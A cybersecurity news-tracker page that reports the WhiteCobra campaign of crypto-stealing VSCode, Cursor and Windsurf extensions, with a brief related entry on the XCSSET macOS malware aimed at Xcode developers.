CyberHappenings logo

Track cybersecurity events as they unfold. Sourced timelines, daily updates. Fast, privacy‑respecting. No ads, no tracking.

WhiteCobra targets VSCode users with crypto-stealing extensions

First reported
Last updated
1 unique sources, 1 articles

Summary

Hide ▲

A threat actor named WhiteCobra has targeted users of Visual Studio Code (VSCode), Cursor, and Windsurf by uploading 24 malicious extensions to the Visual Studio marketplace and the Open VSX registry. The extensions are designed to steal cryptocurrency. The campaign is ongoing, with the threat actor continuously replacing removed extensions with new malicious ones. Core Ethereum developer Zak Cole reported that his wallet was drained after using a seemingly legitimate extension for the Cursor code editor. The extensions appear legitimate due to professionally designed icons, detailed descriptions, and inflated download counts. WhiteCobra previously conducted a $500,000 crypto-theft campaign in July using a fake extension for the Cursor editor.

Timeline

  1. 13.09.2025 17:00 1 articles · 16d ago

    WhiteCobra uploads 24 malicious extensions to VSCode marketplaces

    WhiteCobra has uploaded 24 malicious extensions to the Visual Studio marketplace and the Open VSX registry, targeting users of VSCode, Cursor, and Windsurf. The extensions are designed to steal cryptocurrency and have been continuously replaced to maintain the campaign. The extensions execute a main file that defers to a secondary script, downloading a platform-specific payload from Cloudflare Pages. On Windows, the payload runs LummaStealer malware via a PowerShell script. On macOS, a malicious Mach-O binary executes locally to load an unknown malware family.

    Show sources

Information Snippets

Similar Happenings

XCSSET macOS Malware Targets Xcode Developers with Enhanced Features

A new variant of the XCSSET macOS malware has been detected, targeting Xcode developers with enhanced features. This variant includes improved browser targeting, clipboard hijacking, and persistence mechanisms. The malware spreads by infecting Xcode projects, stealing cryptocurrency, and browser data from infected devices. The malware uses run-only compiled AppleScripts for stealthy execution and employs sophisticated encryption and obfuscation techniques. It incorporates new modules for data exfiltration, persistence, and clipboard monitoring. The malware has been observed in limited attacks, with Microsoft sharing findings with Apple and GitHub to mitigate the threat. Developers are advised to keep macOS and apps up to date and inspect Xcode projects before building them.